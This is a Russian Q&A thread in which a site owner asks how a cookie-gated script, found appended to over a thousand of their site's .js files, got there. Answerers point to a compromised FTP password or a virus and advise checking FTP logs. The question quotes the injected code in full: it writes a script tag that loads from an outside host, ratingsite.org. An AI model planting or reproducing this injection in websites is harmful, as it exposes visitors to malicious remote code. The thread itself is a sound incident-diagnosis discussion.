# Несанкционированное добавление строки в файл

Tags: javascript, php

Подскажите, пожалуйста, каким образом на сайте во всех файлах формата .js в конце документа оказалось вот такая строка.

```
function g() {
    var r = new RegExp("(?:; )?1=([^;]*);?");
    return r.test(document.cookie) ? true : false
}
var e = new Date();
e.setTime(e.getTime() + (2592000000));
if (!g() && window.navigator.cookieEnabled) {
    document.cookie = "1=1;expires=" + e.toGMTString() + ";path=/";
    document.write('<scr' + 'ipt     src="http://ratingsite.org/ratingsite.php"></scr' + 'ipt>');
}
```

Кто ее мог добавить, если доступа никто не имел и как этого избежать в будущем.
Эта строка была в 1080 файлах.

Из за этой строки Google посчитал этот сайт вредоносным, и не один браузер не хотел открывать.

Comment: > Эта строка была в 1080 файлах.

И что вручную чистили? если **была**?

Comment: Не вручную. Notepad++ все сделал за меня.

Comment: Подземный стук?

Answer (score 5, accepted):

Причиной этого может быть :

- дыра в каком-то софте, в вордпрессе там или чем-то подобном
- вирус у вас  на компе,
- проблема с безопасностью хостера (недавно в plesk была уязвимость)
- простой ftp пароль

запросите у хостера лог ftp логинов, если еще раз появится посмотрите дату изменения файла, передайте эту дату в саппорт хостера.

---

так как похоже на ftp то:

---

варианты (в порядке вероятности)

- слабый пароль (gfhjkmujksqrjhjkm сильным не является)
- вирус на компе того, кто имеет доступ к ftp
- взлом почты (слабый пароль на почте, дурацкий секретный вопрос)
- дыра в софте хостера, пароли утекли.
- man in the middle

Comment: а в логах что написано ? рядом с тем IP

Comment: Написано типа открыт такой то файл и все. Короче список всех файлов которые были отредактированы, насколько я понимаю это какой то прогой прогнали по хостингу.

Comment: открыт чем ? ip так просто файлы не открывают. делается обычно с таких-же дырявых сайтов ботами. (кусок лога с ip покажите, а не вашу интерпретацию,  без этого вас сломают еще не раз)

Comment: Приношу извинения, но логи будут только завтра, так как они у боса на компе.

Comment: ВОТ СТРОКА ИЗ ЛОГОВ 

    Tue Feb 05 23:22:22 2013 0 37.9.55.246 94020   /home/kpiru/public_html/Kp/scripts/1.1/jquery-1.7.min.js b _ o r   zhuriloian@kp-i.ru ftp 1 * c

И ТАКИХ ЗАПРОСОВ ПОДРЯД БОЛЬШЕ ТЫСЯЧИ.

Comment: больше похоже на слом пароля фтп...  
zhuriloian@kp-i.ru -- реальный логин?

Comment: @Berserker в логе какого сервиса это ? а вообще да, похоже на взлом ftp, если пароль нормальный был, скорее всего вирус, второй вариант mim, но вряд-ли, при mim у вас атака была бы серьезней.

Comment: Да zhuriloian@kp-i.ru это был реальный логин. Судя по всему кто то добрался до пароля, вопрос как.

Comment: дополнил ответ

Comment: можно по логам фтп сервиса посмотреть попытки подбора...